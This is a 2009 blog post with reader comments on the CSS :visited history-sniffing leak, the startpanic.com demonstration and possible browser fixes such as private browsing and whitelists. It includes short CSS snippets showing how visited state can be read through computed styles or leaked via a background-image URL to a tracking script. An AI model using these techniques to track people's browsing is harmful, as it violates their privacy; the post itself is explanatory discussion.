Sharovatov’s Weblog

startpanic.com and :visited links privacy issue

Posted in browsers, privacy, security by sharovatov on 21 April 2009

Back in April 2008 I was blogging about Selectors API support in IE8 Beta 1 support and mentioned the security concern about :visited links – potential privacy theft.

The problem

This concern was risen long ago in CSS2.1 Spec (and also mentioned then in the following specs – CSS3 Selectors, Selectors API spec):

Note. It is possible for style sheet authors to abuse the :link and :visited pseudo-classes to determine which sites a user has visited without the user’s consent.

UAs may therefore treat all links as unvisited links, or implement other measures to preserve the user’s privacy while rendering visited and unvisited links differently.

The original bugzilla issue was reported back in October 2000, Stanford sameorigin whitepapers had this issue described in 2002, then lots of articles followed, and then Ajaxian had an article in 2007 which made this issue really popular.

And now we have http://startpanic.com with nice implementation of this approach – it has a txt database of some thousands URLs that are tested for being visited.

You can check the code – it’s pretty straight forward – links from the database are appended to the iframe where :visited links are displayed and others are hidden, then current style of the current link is checked and if it’s hidden, this link is appended to the big list of visited links.

Possible solutions

Basically, there’re some ways to resolve this issue:

  1. try to protect :visited links computed style access
  2. limit support of :visited
  3. don’t fix it, find a way around

Protect :visited links programmatically

That’s clearly useless. People were suggesting many solutions (which you can get round), like making getComputedStyle return default value for :visited links as if they are not visited – but you can make the case more complex, e.g.

a:link span {display: none;}
a:visited span { display: block }

and then use getComputedStyle to check the span; and all the proposed solutions were weak in some way. But even if you manage to make scripts unaware about the state of your links, there will always be a server-side attack vector – for those links that you want to check you can just specify a unique background-image pointing to some server-side tracking script, e.g.:

#alQaedaLnk:visited {background:url(http://www.cia.gov/track.pl); })

Like here, for example. So it clearly shows us that there’s no way (or it’s too troublesome) to fix this “issue” programmatically.

Limiting support for :visited

As I understood from the discussion with startpanic.com author, he wants to limit :visited support so that only links to pages to the same domain are applied with :visited pseudo class. But this would hurt user experience so much! First example that comes to my head is Google and other search engines – they all colour visited links differently so you can clearly see which pages you’ve already been on and which not. If same-domain policy is applied, all the links in Google search results will be plain blue. This sounds awful to me.

Guys from Stanford security group suggest applying :visited only to those links that were visited from the current domain. This approach was used in Firefox add-on called SafeHistory (it doesn’t work any more). So if you do a search in Google and visit some pages, :visited will be applied to these pages only in Google search results. So if you then do a search on MSN Live Search, all the links there will be plain blue and :visited won’t be applied to them. To me this solution looks weird as well. And Firefox developers said that it would be a problem to support this; and I don’t think other browser vendors will fix this privacy “issue” in that way. Keep on reading, I will explain why.

So from technical prospective the only easy solution would be to completely remove support for :visited pseudo class, which nobody will do because user experience will suffer and people will complain.

Best solution – find a way around

You may think – why not make :visited support configurable in the browser UI?  But that’s what all browsers already have! You can specify that you don’t want to keep history at all, you won’t see visited links anywhere, you will feel that you’re “safe” :).

Another solution – Private Browsing mode

Another nice option is to use Private Browsing mode that’s supported by all modern browsers IE8, Safari, Google Chrome (and then FF3.1 joined). When you visit a site that you don’t want to appear in the history – use Private Browsing mode and you’re safe.

Note: currently Google Chrome has a bug – it applies :visited pseudo class to links in Incognito Mode. However, the bug is fixed and the bugfix will be included in one of new updates.

“Private Browsing” browser feature is the only true solution to this issue.

Here’s a testcase. I visited both http://ya.ru and http://www.google.com links in IE8 InPrivate mode, then went to the testcase page and it didn’t tell anything as if I hadn’t visited these URLs.

When I followed the same process in Google Chrome “Incognito mode”, it showed that I visited both ya.ru and Google.com. This bug is fixed and will be updated in newer versions of Google Chrome.

And this issue is also fixed in FF3.1b3:

In comments Avdeev said that Safari in its Private Browsing mode (they call it Porn mode) didn’t show if the link was visited or not. Great stuff!

Update: It seems that Opera 10 will have Private browsing mode support as well – they are already choosing the name for it – and the most voted one is “Phantom mode” :)

Note: while I understand the whole concern about privacy, you shouldn’t forget that all search engines, adds providers and many many others gather statistics about your visits. When you’re in London (and other major cities), you’re being watched on CCTV constantly, does it bother you? Does this new world leave any space for privacy?

Links:

Share :
About these ads
Tagged with:

42 Responses

Subscribe to comments with RSS.

  1. SP said, on 21 April 2009 at 8:01 am

    ability to access :visited pseudoclass should work only for site’s domain. Thats it ;)

  2. sharovatov said, on 21 April 2009 at 8:17 am

    And why would it be so? The whole idea of hypertext is links between pages and sites. And colouring visited links differently is a nice visual pattern, a usability feature that shouldn’t be limited by same-origin policy. I’m still convinced that it should be configurable (as in FF) and disabled by default in “private browsing mode”.

  3. avdeev said, on 22 April 2009 at 3:26 am

    Safari does its job well. My Safari 3.2.1 just passed your testcase. Actually Safari was the first browser to implement private browsing.

  4. sharovatov said, on 22 April 2009 at 4:40 am

    That’s great, thanks for update, Avdeev!

  5. Olivier Lalonde said, on 22 April 2009 at 6:28 am

    From my own experience, very _FEW_ sites or people care about the :visited visual pattern. I wouldn’t even notice if :visited would stop working !

  6. sharovatov said, on 22 April 2009 at 8:05 am

    I don’t know, Olivier, I notice it very often :)

  7. toxcct said, on 25 April 2009 at 12:21 pm

    and what if the browser were implementing something like a safe-list (like they do for popup blocker), and let the user tell which site is trustable.
    for such sites/domains, the :visited could go cross domains, but be ignored for untrusted sites ?!

  8. sharovatov said, on 25 April 2009 at 2:57 pm

    Thanks for your idea, adding this functionality to a phishing filter can do the job, but really, why do we need it, if there’s Private Browsing mode, and people can find all this information about you anyway; and search engines and other sites will still collect information about you? What’s the point?

    But anyway, if I were to fix this, I’d use your approach. It’s much easier than storing refererring page for every link in the history (as in SafeBrowser add-on) or prohibiting access to getComputedStyle for certain elements. I suggest you tell Mozilla developers about it here – https://bugzilla.mozilla.org/show_bug.cgi?id=147777

  9. Walt Gordon Jones said, on 26 April 2009 at 9:33 pm

    Current “private browsing” keeps sites out of your history, but this whole problem is more about white-listing what sites should *see* your history.

    Why not let the user select which domains can see cross-domain :visited pseudo class? This goes more toward the core issue than the current private browsing solutions.

  10. […] Hier bei Sharovatov wird programmiertechnisch erklärt, wie der relativ simple Trick funktioniert: Es wird der Browser-Cache gelesen. Also jener Cache, den Sie immer leeren sollen. […]

  11. Hugo Heden said, on 10 May 2009 at 8:19 pm

    How about something like what’s suggested in comment #104: https://bugzilla.mozilla.org/show_bug.cgi?id=147777#c104

    That is, the browser would render one page to the user, while maintaining a separate and different page copy under the hood for access from content javascript.. And that separate copy would would “pretend” that *nothing* is :visited (or perhaps that *everything* is :visited — that could perhaps be up to the calling javascript) This would make most exploits impossible, such as the one described in #comment 50.

    One would of course still have to take care of lots of issues mentioned in the bug report (such as correctly handling loading of background images used only in :visited content etc etc)

    How would that work? I guess this is naive, but would be interested to hear in what way. Too much performance impact?

  12. sharovatov said, on 12 May 2009 at 6:32 am

    @Walt Gordon Jones – after thinking this through, I tend to agree with your point from security prospective – if browsers maintain such whitelists, the whole problem will be gone.

    But from the usability prospective this approach is no different to disabling history at all. Consider the following case – user’s doing a research, gathering information on some topic, so when he goes to a website that’s not whitelisted yet, and the page he’s viewing contains loads of links, he won’t see which links he already checked and which not.

    You may say that if he’s doing a research, he may turn :visited links protection off. So whitelisting limits usabillity in automatic mode because for all sites it will be disabled by default. And to make users aware about the issue and make them learn how to operate whitelist functionality is going to take a while. If this is possible, that would be great. However, I do think that browser vendors won’t do anything (and say that there’s Private Browsing mode) or will stick to what Stanford guys proposed. And I agree that it’s easier to teach people to launch Private Browsing mode when they need to surf anonymously rather than teach them how to use whitelisting.

    @Hugo Heden – as you said, having two “layers” of :visited links support won’t protect from background-image-way of checking which links are visited and which not. If I were to fix this issue, I wouldn’t take your approach – it will require too much work. I don’t think browser vendors will follow this route.

  13. Kermit said, on 18 May 2009 at 11:42 pm

    startpanic is certainly nice looking, but I find it very slow (my browser just hangs for 10 minutes or so). There’s a much faster alternative at http://linuxbox.co.uk/stealing-browser-history-with-javascipt-and-css.php

  14. sharovatov said, on 19 May 2009 at 11:50 am

    Kermit, that’s because your alternative has only 1000 addresses while startpanic has 100 000 addresses database. Hundred times more. Don’t you think it’d take a little bit more time to check 100 000 addresses than 1000? :)

  15. samhammer said, on 23 May 2009 at 3:40 pm

    Зачёт
    Очень понравилась ваша заметка! Так держать! Блог в закладки и в ридер!

  16. sharovatov said, on 24 May 2009 at 8:18 am

    спасибо :)

  17. bogdane said, on 27 May 2009 at 1:27 pm

    You’re missing an alternative: simply restricting what a :visited CSS rule can do. The way virtually all websites use :visited is to change link color, so by just white-listing a few properties like color or background-color and blocking all others you cover all use cases while leaking no information to the website (your display:none example wouldn’t work, for example). You could even allow background-image if the user agent always downloads the image regardless of whether the link was visited.

    AFAIK the reason this is not implemented in Firefox is that SVG would still give you tricky ways to access the color: http://www.w3.org/Graphics/SVG/WG/track/issues/2071

  18. Walt Gordon Jones said, on 5 June 2009 at 3:03 am

    @sharovatov I agree many users will understand “private browsing” better than whitelisting, but it’s a fallacy to say it has to be either/or. Browser vendors are free to provide both, and users can decide whether they want to use it.

    I would certainly use a whitelist if it were available since the visited links feature is really not that useful anyway except in very specific situations that usually involve frequently visited — and trusted — sites.

    Thanks for a really thoughtful article on the issue.

  19. sharovatov said, on 5 June 2009 at 6:24 pm

    @bogdane – allowing certain rules only (such as colour, or background-image) won’t solve the problem – you can always use getComputedStyle to access current element style. See https://bug147777.bugzilla.mozilla.org/attachment.cgi?id=87324 testcase.

    @Walt Gordon Jones – well, can you suggest a way how this whitelists will be maintained? What’s the procedure of entering this whitelist and being thrown out from it? First example – Microsoft launched bing.com recently, how soon would it get to whitelists? Who will submit it? How will this work cross-browser? Or, another example – site X was whitelisted and then they decided to gather statistics on which competitors their clients visit – who will throw it out from the whitelist? What if this was only a XSS and admins then fixed it in 1 day? I was thinking about this and couldn’t find any satisfactory solutions. But of course, I’m open for a discussion :)

  20. Walt Gordon Jones said, on 5 June 2009 at 7:01 pm

    @sharovatov I don’t think there should be a master whitelist. Browsers right now let me mark a site as a favorite (worded differently depending on the browser.) Why can’t I just mark a site as “trusted” and other sites don’t get my history information. My list would be different from yours. It’s maintained in the browser, which is where my links are being marked up anyway.

    My point is that it doesn’t have to be burdensome. For 99% of sites I really don’t need purple visited links. That’s a hold-over from an earlier era of the web, before anyone had any idea how it would be used today.

    The idea that the only way to protect your history data is to give up keeping history at all seems broken to me. Just because the information is in the browser, and I may use it in other ways, doesn’t mean it has to be used to mark up the rendered HTML on sites I visit. There’s nothing that inextricably ties history to the browser’s rendering engine.

  21. tom said, on 8 June 2009 at 4:12 pm

    Until we found a solution, someone should build a noisy history file for Firefox with 4 billion entries.

  22. sharovatov said, on 8 June 2009 at 8:09 pm

    @Walt Gordon Jones I see your point. Though this is quite reasonable and seems useful to me, I still don’t think that browser vendors will do it. First of all, almost all browser vendors are investing in promoting Private Browsing mode which “fixes” the issue. Do you think they will spend another fortune in implementing and promoting this feature while they already have something that fixes the problem? Don’t think so. And from user’s prospective it’s easier to understand “a mode where nothing is stored and tracked” rather than a “list of trusted sites where you have to add a site that you’d like to apply :visited links”. I believe that nobody would ever add anything to such a list and we’ll lose :visited links functionality at all. The current approach is “allow everything and teach user how to behave properly”, you propose to “prohibit everything and teach user how to allow stuff”. From the security prospective your approach is clearly better but to me it means that we’ll just lose this feature.

    And I don’t think that you don’t notice coloured :visited links. I just went to digg, opened up a post about Hezbollah in Lebanon and then went to google to search for more details. First thing that I’ve noticed was purple link that I’ve just visited from digg. Don’t know, but it seems really useful for me.

  23. Walt Gordon Jones said, on 8 June 2009 at 9:19 pm

    @sharovatov

    The value of history tracking is not just in colored links. Chrome and Firefox both have auto-suggest in the address bar that utilizes your history. There should not be a tacit rule that for your browser to have auto-suggest, you also have to share that same history information with every rogue site out there (or any site, for that matter.)

    To put it differently, if using visited links to build a marketing profile on your site visitors is ethical, then everyone should be doing it openly. If it is unethical, there is a problem.

  24. sharovatov said, on 10 June 2009 at 5:48 am

    @Walt Gordon Jones

    I do think that separating the history store from the ways it’s being used is important. I also would like to have a way to configure every single aspect of my browser including the way how it applies styles to different elements and pseudoclasses. But will any browser vendor allow such configuration? I doubt. And even if it does, 99.99% users won’t use it. Do you have an idea on how many firefox users actually used about:config to configure anything? I wouldn’t bet, but I think it’s a real minority.

    Again – I love your suggestion, but I don’t think any browser vendor will take it because they already have private modes and they spent a fortune on promoting it.

    As to the marketing stats – noone’s objecting Google in getting marketing statistics and creating user profiles based on how and what users search, noone’s objecting CCTV cameras installed every 5 meters in London, noone’s objecting to contextual adds being displayed. Yes, marketing stats can be gathered, but they can be gathered by so many other ways that this one is really not so important (to my point), mainly because there’s Private Modes which must be used when you don’t want anyone to know where you’ve been.

    Btw, thanks for interesting conversation, I really appreciate it! And thanks for the interesting blog, I subscribed to your RSS.

  25. jVincent said, on 14 June 2009 at 9:32 am

    I heavily disagree with the statement
    ““Private Browsing” browser feature is the only true solution to this issue.”

    The problem Isn’t that visited links render differently, its that the serverside can determine which rendering was chosen. The simplest solution is simple to render both versions, and then clientside chose which one to show to the user, without the serverside ever figuring out.

    This approach comes from the nice and more general attitude that the userside should have capability to use local content to genereate the final rendering without it being nessesary to transfer information to the serverside.

  26. sharovatov said, on 14 June 2009 at 6:39 pm

    @jVincent

    Sorry, mate, I didn’t understand anything from your comment. Did you read this blogpost?

  27. Walt Gordon Jones said, on 14 June 2009 at 6:55 pm

    @sharovatov

    The future will tell what browser vendors will do. I have no idea. It will be interesting to see if this topic ever crosses over from developer blogs to the mainstream.

    Thanks for subscribing to my blog!

    Walt

  28. sharovatov said, on 14 June 2009 at 7:02 pm

    @Walt Gordon Jones

    You’re absolutely right about the future. Let’s see how Firefox handles the issue – bugzilla entry 147777 has very detailed discussion on this topic.

    And thanks for great conversation :) Your blog inspired me to install RoR, which I haven’t been using for almost 2 years. Cool :)

  29. David Hagler said, on 15 June 2009 at 5:43 am

    Well, just my two cents, but if the browser preloaded the files referenced in any style sheet, it would make this attack useless, and waste very little if any resources.

    I would argue that any website that references any file in its style sheet is aiming to use that file at some point, and unless you have some massive amounts of styles information refering to lots of images not on the current page ( you should redesign, but,…) then this should be a fair fix, and not require copious amounts of security rewriting and code manipulations of the current browsers.

  30. […] has been made to limit how history gets *out* of the browser. Here is what I said in a comment on Vitaly Sharovatov’s blog and has been quoted on Slashdot: The idea that the only way to protect your history data is to give […]

  31. Walt Gordon Jones said, on 18 July 2009 at 6:40 pm

    @sharovatov I just noticed our exchange here was referenced in comments on Slashdot ( http://slashdot.org/article.pl?sid=09/06/13/2125211 ), and it has inspired me to go ahead and write about the situation from my point of view. :) ( http://waltgordonjones.com/244/just-dont-have-anything-worth-stealing ) I hope you’ll take a look, and thanks again for your excellent post and conversation here on the issue.

    @David Very good point, but there is still a javascript way to do this, and I think the attitude to just turn off javascript is as much a non-solution as to just turn off history.

  32. Deeper Voice said, on 22 July 2009 at 6:27 pm

    The future will tell what browser vendors will do. I have no idea. It will be interesting to see if this topic ever crosses over from developer blogs to the mainstream.

  33. Deeper Voice said, on 22 July 2009 at 6:28 pm

    And thanks for great conversation :) Your blog inspired me to install RoR, which I haven’t been using for almost 2 years. Cool :)

  34. Jake said, on 1 August 2009 at 1:29 am

    Excellent article, спасибо!
    However, my concern is that there are sites that collect email addresses for upcoming spam under the false “petition” presumption. We’ll have to figure out a better way to protect privacy…

    Еще раз, спасибо!

  35. resveratrol supplements said, on 2 September 2009 at 11:58 am

    You may say that if he’s doing a research, he may turn :visited links protection off. So whitelisting limits usabillity in automatic mode because for all sites it will be disabled by default.

  36. RegCure Review said, on 29 October 2009 at 9:49 am

    I have no idea. It will be interesting to see if this topic ever crosses over from developer blogs to the mainstream.

  37. grow taller 4 idiots said, on 29 October 2009 at 10:14 am

    This approach comes from the nice and more general attitude that the userside should have capability to use local content to genereate the final rendering without it being nessesary to transfer information to the serverside.

  38. […] See also startpanic.com and :visited links privacy issue. […]

  39. […] in browsers, privacy by sharovatov on 17 March 2010 This is a follow up to my old post about :visited links privacy issue. I thought the best solution for this issue would be educating users about the problem and […]

  40. orxzen said, on 13 September 2010 at 1:21 pm

    php web developement company

  41. […] information to sites you visit – via a weakness that’s been there since CSS 2.1 (read this for […]


Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Follow

Get every new post delivered to your Inbox.

%d bloggers like this: